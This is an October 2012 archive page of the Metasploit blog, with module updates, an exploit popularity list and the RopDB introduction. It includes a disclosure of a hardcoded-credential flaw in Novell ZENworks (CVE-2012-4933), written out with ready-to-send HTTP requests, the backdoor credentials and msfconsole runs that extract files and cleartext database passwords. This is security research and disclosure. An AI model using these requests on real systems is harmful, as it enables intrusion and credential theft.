Skip navigation
All Places > Metasploit > Blog > 2012 > October
2012

AppSecUSA 2012

 

Last week was AppSecUSA 2012 here in Austin, which may explain the curious absence of a weekly Metasploit Update blog post. The hilights of Appsec for me, were (in no particular order): Meeting Raphael @ArmitageHacker Mudge in person for the first time, meeting Scott @_nullbind Sutherland, author of a bunch of recent Microsoft SQL post modules, and both of whom happened to contribute to last week's Metasploit update pretty significantly.

 

I also got to meet the guys behind Gauntlt, the modestly-described "security testing tool built on Cucumber." I'm really pretty excited about Gauntlt and am currently looking around for some time to really dig into the code base. Think of it like an automated, continuous integration-style of pen-testing for already deployed application infrastructure (and that description is probably selling it pretty short). It's pretty neat and this whole ruggedization thing is what made AppSecUSA one of the better conferences this year.

 

Oh yeah, the update

 

During AppSecUSA, we did manage to squeeze out an update to Metasploit. I know you all sit by your RSS feeds just waiting for notification, and while I did tweet the release notes, I did neglect to mention the update on the blog here. So, here you go, the micro-summary:

 

The update is centered around fixes for bugs reported by Raphael, some neato post modules by nullbind and mubix (the former wrote some post SQL modules, the latter, some core Windows config post modules), and we have one (count 'em, one) new exploit module for Turbo FTP Server. That exploit got some love from long-time contributors corelanc0d3r, thelightcosine, and Lincoln. Thanks guys!

 

New Modules

 

Here's the breakdown of the new modules with the links to Metasploit's Exploit Database.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

ZENWorks' Accidental Backdoor

 

This week, we saw the release of Metasploit exploit developer Juan Vazquez's freshly discovered vulnerability in Novell ZENWorks. You can read all about it in Juan's great technical blog post, but the short version for the attention-deprived is: Novell ZENWorks ships with hard-coded credentials, which allow for SYSTEM-level file system read access.

 

That seems like kind of a big deal for ZENWorks users -- namely because there's no reasonable way to change these credentials in the ZENWorks interface. I don't know about you, but that sounds like a backdoor to me.

 

Of course, we take reasonable disclosure pretty seriously here. We don't call it "responsible disclosure," since that's usually just code for "secretly inform vendors and wait on their schedule before warning users," nor is it "full disclosure," because we don't just drop 0day as soon as we find it. I think what we do here at Rapid7 as a very reasonable middle ground. In this case, we notified the vendor, we shared with US-CERT, and now we're letting the users know, all on a predictable time table.

 

For what it's worth, most vendors can ship a bugfix given a couple months' notice. For whatever reason, we haven't seen a fix from Novell on this one yet, so if you're a customer, you might have better luck than us (and US-CERT) in getting a reasonable response. In the mean time, feel free to validate the backdoor yourself with Juan's spiffy Metasploit modules, linked below.

 

PHP EXE

 

In other exploit dev news, we're also shipping this week James "Egypt" Lee's PHP EXE payload. This library should help automating the generation of a hundred thousand more remote, arbitrary PHP code execution vulns in the universe of hastily-written PHP apps.

 

So, for ARCH_PHP targets, the PhpEXE payload simply returns the given encoded payload wrapped in <?php ?> markers.

 

For target architectures other than ARCH_PHP, this will base64 encode an appropriate executable and drop it on the target system.  After running it, the generated code will attempt to unlink the dropped executable. Note that unlinking executables in this way nearly always fails on Windows, so you will certainly leave artifacts of exploitation behind there.

 

Kernelsmith Becomes Open Source Issue Manager

 

This week, long-time Metasploit contributor and #metasploit IRC troublemaker Kernelsmith stepped up and volunteered to serve as a volunteer issue manager. Hooray! What this means is that we'll have someone around championing your bug reports and feature requests who is a) already capable with Metasploit b) already active in the Metasploit community and c) not beholden to a Rapid7 paycheck.

 

This last bit is important for the whole open source ethos that we're pursuing with Metasploit. Kernelsmith cares about the free Metasploit Framework first and foremost, mainly because he uses it all the time. Because of this, he's a pretty ideal ombudsman-type figure to keep us honest and responsive to your bugs.

 

Of course, it's important to note that Kernelsmith isn't our community whipping boy. He has a life and a job and all that, and though he loves Metasploit at least as much as I do, he really is "just" volunteering to help clean up our issue tracking act. So, let's be nice and not try to pile on all our drudgery all at once.

 

So, if you have a bug that's been languishing on the pile over on our Redmine issue tracker, take heart -- Kernelsmith is, at this very moment, separating the wheat from the chaff. If you don't see progress on your pet bug in the immediate term, feel free to bump it via a Redmine comment. We have a bit of a backlog to work through, but with Kernelsmith's and your help, we should be making some real progress on responsive and responsible issue management in the coming weeks.

 

New Modules

 

Here's the breakdown with the links to Metasploit's Exploit Database.


Exploit modules


Auxiliary and Post modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

justifying your pen testing budget.PNG

Is penetration testing a good idea to you, but your managers don't seem to get it? Don't worry, you're not alone, and there is a solution. This Whiteboard Wednesday video walks you through some steps to achieve your goal - and to get your budget approved.

 

Areas I'll touch on are:

 

  • How do I explain penetration testing to my boss?
  • Why do we need penetration testing if we have all these security controls in place?
  • Should I be using the fear factor to sell security?
  • How do I build on penetration testing as a success factor?
  • How do I get buy in for penetration testing?
  • How do I calculate the return of investment (ROI) for penetration testing?

 

Click on the video on your right to watch the video!

 

Prefer to read? Download this white paper on How to Justify Your Penetration Testing Budget.

Today, we present to you a flashy new vulnerability with a color-matching exploit straight from our super secret R&D safe house here in Metasploit Country. Known as CVE-2012-4933, it applies to Novell ZENworks Asset Management 7.5, which "integrates asset inventory, software usage, software management and contract management to provide the most complete software asset management tool available". Following our standard disclosure policy, we notified both Novell and CERT, and today CERT has published it. The new Metasploit exploit gives you access to files on the system using system privileges and gets you all the way to the backend credentials in clear text. What else could you ask for on a crisp Monday morning in fall?

 

Vulnerability Summary

 

ZENworks Asset Management provides a Web Console, where the user can access the data collected about network devices and edit some information. This web interface provides some maintenance calls, two of them accessible with hardcoded credentials, allowing a remote attacker:

 

  • To retrieve any file from the remote file system with SYSTEM privileges.
  • To get configuration parameters from the ZENworks Asset Management including the backend credentials in clear text.

 

Disclosure Timeline

 

DateDescription
2012-08-09Initial discovery by Juan Vazquez
2012-08-09

Metasploit module written

2012-08-15Initial disclosure to Novell
2012-08-30Disclosure to US CERT
2012-10-15Public disclosure and Metasploit module published

 

Technical Analysis

 

The Web Console of ZENworks Asset Management is provided through a Java Web Application. The Web Application (with name “rtrlet”) provides a Servlet named “Rtrlet”. This servlet provides a function named “HandleMaintenanceCalls” where the different maintenance actions are implemented. This function is called every time a POST or GET request is managed by the “Rtrlet” servlet. The call flows until the HandleMaintenanceCalls() are: doGet() / doPost() => DoReport() => HandleMaintenanceCalls(). The flow is analyzed below:

 

  • From the doGet() function:

 

public void doGet(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
  throws ServletException, IOException
{
  if(!ServletStatuses.UpdaterReady())
  {
  DoNotReadyResponse(httpservletrequest, httpservletresponse);
  return;
  } else
  {
  ReportParams reportparams = new ReportParams(RequestNumber++);
  cat.debug("ECNC1: " + rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
  httpservletrequest.setCharacterEncoding(rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
  LoadRP(reportparams, httpservletrequest);
  DoReport(httpservletrequest, httpservletresponse, reportparams); // Call to DoReport()
  return;
  }
}




























 

  • From the doPost() function:

 

public void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
  throws ServletException, IOException
{
  if(!ServletStatuses.UpdaterReady())
  {
  DoNotReadyResponse(httpservletrequest, httpservletresponse);
  return;
  }
  ReportParams reportparams = new ReportParams(RequestNumber++);
  String s = httpservletrequest.getContentType();
  if(s.startsWith("multipart/form-data"))
  {
  try
  {
  cat.debug("Content type is " + s);
  String s1 = CWD + IMPORT_FOLDER;
  cat.info("Import scripts directory has been set to : " + s1);
  String s2 = s1 + File.separator;
  cat.debug("doPost(): uploadDest=" + s2);
  File file = new File(s2);
  if(!file.exists())
  file.mkdirs();
  String s3 = "";
  MalibuMultipartRequestParser malibumultipartrequestparser = new MalibuMultipartRequestParser(httpservletrequest, s2, "", s3);
  malibumultipartrequestparser.parseRequest();
  HashMap hashmap = malibumultipartrequestparser.getWebVars();
  LoadRP(reportparams, hashmap);
  }
  catch(Exception exception)
  {
  cat.debug("Unhandled exception reading multipart data in rtrlet", exception);
  }
  } else
  {
  cat.debug("ECNC2: " + rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
  httpservletrequest.setCharacterEncoding(rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
  LoadRP(reportparams, httpservletrequest);
  }
  DoReport(httpservletrequest, httpservletresponse, reportparams); //Call to DoReport()
}




























 

Once in the DoReport() function the first thing done is call to HandleMaintenanceCalls():

 

private void DoReport(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse, ReportParams reportparams)
  throws IOException
{
  if(HandleMaintenanceCalls(httpservletresponse, reportparams)) // Call to HandleMaintenanceCalls
  return;




























 

The HandleMaintenanceCalls() function manage the maintenance calls. The maintenance call is selected by a parameter named "maintenance":

 

private boolean HandleMaintenanceCalls(HttpServletResponse httpservletresponse, ReportParams reportparams)
  throws IOException
{
  if(reportparams.GetParam("maintenance").equals(""))
  return false;
  if(httpservletresponse == null)
  return false;
  cat.info("Maintenance request");
  if(reportparams.GetParam("maintenance").equals("resetsession")) // Checks if maintenance == "resetsession"
  {
  }
  if(reportparams.GetParam("maintenance").equals("XSLTOff")) // Checks if maintenance == "XSLTOff"
  {
  }
  if(reportparams.GetParam("maintenance").equals("XSLTOn")) // Checks if maintenance == "XSLTOn"
  {
  }
  if(reportparams.GetParam("maintenance").equals("ShowLogins")) // Checks if maintenance == "ShowLogins"
  {
  }
  if(reportparams.GetParam("maintenance").equalsIgnoreCase("help")) // Checks if maintenance == "help"
  {
  }
  // Checks if maintenance == "GetFile" or maintenance == "GetConfigInfo"
  if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetFile") || reportparams.GetParam("maintenance").equalsIgnoreCase("GetConfigInfo"))
  {
  }
  if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetFile_Password")) // Checks if maintenance == "GetFile_Password"
  {
  }
  if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetConfigInfo_Password")) // Checks if maintenance == "GetConfigInfo_Password"
  {
  } else
  {
  return false;
  }
}




























 

From the above snippet of code the next maintenance calls are identified: "resetsession", "XSLTOff", "XSLTOn", "ShowLogins", “help”, “GetFile”, “GetConfigInfo”, “GetFile_Password” and “GetConfigInfo_Password”. Two of them are protected by hardcoded credentials: "GetFile_Password" and "GetConfigInfo_Password":

 

  • GetFile_Password

 

// Checks if username == "Ivanhoe" and password == "Scott"
if(!reportparams.GetParam("username").equalsIgnoreCase("Ivanhoe") || !reportparams.GetParam("password").equalsIgnoreCase("Scott"))
{
  printwriter3.println("Sorry</html>");
  printwriter3.close();
  return true;
}




























 

  • GetConfigInfo_Password

 

// Checks if username == "Ivanhoe" and password == "Scott"
if(!reportparams.GetParam("username").equalsIgnoreCase("Ivanhoe") || !reportparams.GetParam("password").equalsIgnoreCase("Scott"))
{
  printwriter4.println("Sorry</html>");
  printwriter4.close();
  return true;
}




























 

In both cases the functions are protected by the credentials Ivanhoe / Scott, and allow to:

 

  • (1) Access to any file in the file system in the case of the "GetFile_Password":

 

if(reportparams.GetParam("absolute").equalsIgnoreCase("yes"))
{
  s = reportparams.GetParam("file");
} else
{
  Properties properties = new Properties(System.getProperties());
  String s2 = properties.getProperty("tomcat.home");
  if(s2 == null)
  s2 = properties.getProperty("catalina.home");
  if(s2 == null)
  s2 = "";
  s = s2 + "/" + reportparams.GetParam("file");
}
printwriter3.println("<br/>File name = " + s + "<br/><br/><br/>");
try
{
  File file = new File(s);
  FileInputStream fileinputstream = new FileInputStream(file);
  int j1 = fileinputstream.available();
  Integer integer = new Integer(reportparams.GetParam("kb"));
  int l1 = j1 - integer.intValue() * 1000;
  if(l1 > 0)
  fileinputstream.skip(l1);
  printwriter3.println("<pre>");
  int i2;
  while((i2 = fileinputstream.read()) != -1)
  printwriter3.write(i2);
  printwriter3.println("</pre>");
  fileinputstream.close();
}




























 

  • (2) Access to the ZENWorks Asset Management 7.5 configuration parameters, including the backend credentials in clear text, in the case of the GetConfigInfo_Password".

 

Exploitation

 

After examining the "GetFile_Password" and "GetConfigInfo_Password" calls, the requests that allow getting access to both functions can be built. The requests and the info retrieved are presented below.

 

  • GetFile_Password: The next request allows accessing the "GetFile_password" to retrieve the "c:\boot.ini" configuration file in a Windows installation:

 

POST /rtrlet/rtr HTTP/1.1
Host: 192.168.1.147:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 115


kb=100000000&file=c:\boot.ini&absolute=yes&maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit

 

The response to the request contains the file contents:

 

HTTP/1.1 200 OK

Content-Length: 341

Date: Sun, 12 Aug 2012 11:28:10 GMT

Server: Apache-Coyote/1.1

 

 

<html>

<b>Last 100000000 kilobytes of c:\boot.ini</b><br/>

<br/>File name = c:\boot.ini<br/><br/><br/>

<pre>

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

</pre>

</html>

 

  • GetConfigInfo_Password: The next request allows accessing the "GetConfigInfo _password" maintenance task and retrieve the ZENWorks Asset Management Configuration:

 

POST /rtrlet/rtr HTTP/1.1
Host: 192.168.1.147:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
     
kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit

 

The response contains the ZENWorks Asset Management configuration parameters, including the database credentials in clear text:

screen.png

 

In order to allow metasploit users to test their Novell ZENworks Asset Management installations two auxiliary modules have been added:

 

  • (1) To retrieve arbitrary files with SYSTEM privileges through the GetFile maintenance task

 

  
msf > use auxiliary/scanner/http/zenworks_assetmanagement_fileaccess 
msf  auxiliary(zenworks_assetmanagement_fileaccess) > set RHOSTS 192.168.1.131
RHOSTS => 192.168.1.131
msf  auxiliary(zenworks_assetmanagement_fileaccess) > show options

Module options (auxiliary/scanner/http/zenworks_assetmanagement_fileaccess):

   Name      Current Setting                        Required  Description
   ----      ---------------                        --------  -----------
   ABSOLUTE  true                                   yes       Use an absolute file path or directory traversal relative to the tomcat home
   DEPTH     1                                      no        Traversal depth if absolute is set to false
   FILEPATH  C:\WINDOWS\system32\drivers\etc\hosts  yes       The name of the file to download
   Proxies                                          no        Use a proxy chain
   RHOSTS    192.168.1.131                          yes       The target address range or CIDR identifier
   RPORT     8080                                   yes       The target port
   THREADS   1                                      yes       The number of concurrent threads
   VHOST                                            no        HTTP server virtual host

msf  auxiliary(zenworks_assetmanagement_fileaccess) > run

[*] 192.168.1.131:8080 - Sending request...
[*] 192.168.1.131:8080 - File retrieved successfully!
[*] 192.168.1.131:8080 - File saved in: /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(zenworks_assetmanagement_fileaccess) > cat /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin
[*] exec: cat /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost

 

  • (2) To retrieve the configuration of Novell ZENworks Asset Management through the GetConfig maintenance task

 

  
msf > use auxiliary/scanner/http/zenworks_assetmanagement_getconfig 
msf  auxiliary(zenworks_assetmanagement_getconfig) > set RHOSTS 192.168.1.131
RHOSTS => 192.168.1.131
msf  auxiliary(zenworks_assetmanagement_getconfig) > show options

Module options (auxiliary/scanner/http/zenworks_assetmanagement_getconfig):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.1.131    yes       The target address range or CIDR identifier
   RPORT    8080             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf  auxiliary(zenworks_assetmanagement_getconfig) > run

[*] 192.168.1.131:8080 - Sending request...
[*] 192.168.1.131:8080 - File retrieved successfully!
[*] 192.168.1.131:8080 - File saved in: /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__811678.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

The configuration will include the database credentials:

 

$ grep "^DBUser" -A5 /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__81 1678.bin

DBUser

</td>

<td>

NCSystem

</td>

</tr>

$ grep "^DBPassword" -A5 /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__81 1678.bin

DBPassword

</td>

<td>

tally

</td>

</tr>

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Introducing RopDB

 

Screen shot 2012-10-02 at 12.07.20 PM.pngThis week, Metasploit exploit devs Wei "sinn3r" Chen and Juan Vazquez finished up Metasploit RopDB. This advancement allows for drop-in ROP chains in new exploits, without all that mucking around with copying and pasting mysterious binary blobs from one exploit to the next. For the details on how to use it and what to expect in the API, see sinn3r's most excellent blog post. What all this does is bottle up ROP wisdom in a central repository, so chains can be added and modified easily without having to touch the dozens of modules that might rely on them, and generally makes exploit development -- especially browser exploit development -- that much more quick and painless. Thanks guys!

 

Refreshed Sample Modules

 

Speaking of copy-pasting code, often, when people ask about writing Metasploit modules, the advice most often given is to look around the modules tree to find one that kind of does what you want. Then, ta-da, copy and paste it into your new module, and go from there. Sadly, though, that advice means that new modules will sometimes have code that's cargo culted in for no apparent reason.

 

This week, Metasploit core developer James "Egypt" Lee refreshed our aging sample modules hidden deep (well, two levels) within the documentation subdirectory -- if you want to know the bare minimum (and bare correctness) for sample module format, that is a fine place to look. Incidentally, the gentleman hackers over at Corelan Team provide mona.py, a python script that can help you pump out new Metasploit modules as well. Mona.py is quite versatile  and goes farther than our own samples do, in that it can create some specialized file format style exploit modules as well.

 

Local Privilege Escalation Exploits Modules

 

This week also sees some new additions to the local privilege exploitation landscape, using the new local exploitation techniques. Rob "mubix" Fuller converted the venerable Windows Escalate UAC Protection Bypass (by David "ReL1k" Kennedy, mubix, and mitnick) to a local exploit (as opposed to the older post-exploit module), as well as added a new UAC Execute RunAs by mubix exploit. In addition, Matteo Memelli and Spencer McIntyre committed MS11-080 AfdJoinLeaf Privilege Escalation, which elevates the user to a SYSTEM context.

 

Local exploits have been available for a little while now in Metasploit Framework, and their use is catching on. The distinction from a post exploitation module is subtle, but important. If you want to perform some task via an exploit session, then you probably want a Post module. For example, the recent GPG key enumeration module from community contributor Dhiru Kholia leaps to mind. You're doing useful things, but you're not running any shellcode on the target.

 

On the other hand, if you want run a configurable payload, then you definitely want a local exploit like the ones mentioned above. I expect most of the "escalate" post modules are better suited as local exploit modules, now that the capability has been cooking for a while. So, if you have a favorite in there, now is a fine time to convert it.

 

Coming Soon: Mobile Vulnerabilities

 

As you no doubt heard, the guys over at Mobilisafe joined the Rapid7 family (syndicate? No, let's go with "family") this week. This means we all get to get smarter about exploring and exploiting mobile vulnerabilities. We already have payloads for ARM platforms, and Mobilisafe maintains a pretty sweet list of vulnerable devices, so it should be just connecting the dots to get some Metasploit module love all up in your Android or iOS gadget, right?

 

Well, it's a teensy bit more complicated that that, of course. We're building out a mobile device lab here in the labyrinthine Metasploit Software and Pizza Delivery Headquarters, where we can tackle some of the persistence problems that we tend to run into with exploiting mobile vulnerabilities. In the meantime, if you have ideas for some nice mobile Metasploit exploits, get thee to our Pull Request queue and we'd love to see what you're up to.

 

New Modules

 

Here's the list of new modules this week. For info on usage, just follow the links to Metasploit's Exploit Database.

 

Exploit modules

 

Auxiliary and post modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Metasploit blog.jpg

Each month we report the top ten searched exploit and auxiliary modules on metasploit.com. The statistics are drawn from our exploit database by analyzing webserver logs of searches, not through Metasploit usage which is not tracked to preserve privacy.

 

With the Java and Internet Explorer 0-days in August and September, this month's exploit trends from Metasploit really shook-up the status quo. And, just to make things more interesting, there are a couple exploits from April that came back for an encore at numbers 9 & 10.

 

Without further ado, here are September's Top Ten Exploits with commentary from Metasploit guru todb.

 

1. Java Atomic Reference Array Type Violation Vulnerablity (CVE-2012-0507): A returning entry from the April Top 10, this module makes its comeback because of all the Java 0day traffic from August. This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug.The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that just works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed. Returning entry from the April Top 10 Exploits.

2. Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshow. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #1 last month.

3. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. New entry this month.

 

4. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Down two places from #2 since last month.

5. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down two places from #3 since last month.

6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down two places from #4 since last month.

7. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft’s Security TechCenter. Down two places from #5 since last month.

8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Down two places from #6 since last month.

9. Apache mod_isapi <= 2.2.14 Dangling Pointer: Another returning module from April, although why this one's back is a bit more of a mystery. Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular. Returning entry from the April Top 10 Exploits.

10. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: The third April comeback module, and still not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Returning Entry from the April Top 10 Exploits.

 

If you want to use any of these exploits right now, you can download Metasploit for free!

This update has something for everyone -- new exploits, new auxiliary modules, new post modules, and even new payloads. If quadfecta is a word, we totally hit it this week!

 

More Mac OSX 64-Bit Payloads

 

The parade of OSX 64-bit payloads continues, with five new 64-bit payloads added this week:

 

  • modules/payloads/singles/osx/x64/say.rb
  • modules/payloads/singles/osx/x64/shell_find_tag.rb
  • modules/payloads/stagers/osx/x64/bind_tcp.rb
  • modules/payloads/stagers/osx/x64/reverse_tcp.rb
  • modules/payloads/stages/osx/x64/dupandexecve.rb

 

Nemo was responsible for last week's new 64-bit payloads, so huge thanks again to him for continuing to fill out Metasploit's payload offerings for Apple platforms. I'm looking forward to seeing how this whole OSX-as-a-target theme unfolds.

 

Exploit for Samba ZDI vulnerability

 

It's always handy to have fresh Samba exploits -- in local area networks, Samba is often found as a core intranet service so people in different organizations can easily share files across platforms. So, targets running Samba tend to be pretty high-value for pen-testers. Thanks especially to blasty, from whom Metasploit was able to port the exploit. If this attribution isn't correct, then I'm sure someone will let us know. (:

 

This particular vulnerability was apparently reported is was reported initially via TippingPoint's ZDI program back in March and fixed in April. So, while this isn't an 0-day in any meaningful sense, it's still technically difficult to pull off reliable Samba.

 

Local enumeration modules

 

This update features a couple local enumeration post modules by community contributor Barry Shteiman. The first, enum_db, goes through the Windows registry to pick up all kinds of information about all kinds of databases -- specifically, Oracle, Microsoft SQL, MySQL, and Sybase. The second paws through local installations of Apache Tomcat, and can turn up usernames, passwords, and roles, since they're stored in the clear in a known location. These are a very typical post-exploit chores, so automating this kind of thing as a post module is hugely useful. Thanks Sectorix!

 

Print Job Hijinks

 

Finally, we have a new auxiliary module, printjob_capture, from long time Metasploit contributor Chris John Riley. I kind of fell in love with this module module when it popped up in our pull queue, and immediately set about stealing print jobs here in the Metasploit office (with permission, of course). It's great fun and totally spooky -- you end up saving off a copy of the print job in an easy-to-read PS format, then handing off the print job to the real printer. The victim, of course, is none the wiser. I'm working up a screencast of this module in action, since producing a printjob as it comes off the tray of a real printer has some pretty excellent theatrical value.

 

New Modules

 

All in all, not a bad haul -- here's the breakdown with the links to Metasploit's Exploit Database.

 

Exploit modules


Auxiliary modules


Post modules

 

It's not all gem updates, of course. We have a smattering of new modules for you, too. For details and usage on these, just follow the links to our Exploit Database.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Data Execution Prevention (DEP) has always been a hot topic in modern software exploitation.  This is a security feature implemented in most popular operating systems, designed to prevent a program from executing in a non-executable memory location.  So when a malicious code tries to inject payload in memory, it should fail during execution, and then simply crashes.  But here's the thing, although DEP plays an important role to your computer's countermeasures, it is not without a kryptonite.  When researchers such as Hovav Shacham introduced the Return-Oriented Programming (ROP) technique, it pretty much became the standard way to bypass DEP, and is still in use today.

 

However, when done manually, ROP can be a time-consuming task, sometimes painful.  A couple of years ago, if you were able to ROP anything, you were a ROP star!  As the technique became more well-understood by the general exploit dev community, tutorials and better tools were written to collect gadgets in order to speed up exploit development, and then ROP was a bit easier.  Eventually, Peter Van Eeckhoutte created mona.py to automate ROP generation -- getting a ROP chain done can be as simple as typing: "!mona rop".  Nowadays, many Metasploit modules (especially the browser ones) are just copy-and-pasting the same ROP chains to get code execution... but what's the point of repeating the same code over and over again?  The new RopDB mixin puts an end to that.

 

Metasploit RopDB addresses these needs based on our development habits:

  • Allow more reusable ROP chains in browser exploit development.
  • Allow two common attack vectors: non-ASLR plugins, or info leaks.
  • Simplify ROP maintenance.

 

The RopDB Database

 

There are mainly two components: the database, and the mixins.  The database itself consists of multiple XML files that store battle-ready ROP chains, each for a specific DLL.  The XML structure is best explained by the following image:

 

Screen shot 2012-10-02 at 12.07.20 PM.png

 

A "gadget" in this case, serves two different purposes:

  • "offset" - This is used to store the actual offset (to the base address).
  • "value" - This is used to store an integer that's not an address (offset). Or, to store a symbol, which will be converted to an integer during payload generation.  These are the symbols the mixin supports:
    • "nop" - A NOP
    • "junk" - A 4-byte junk
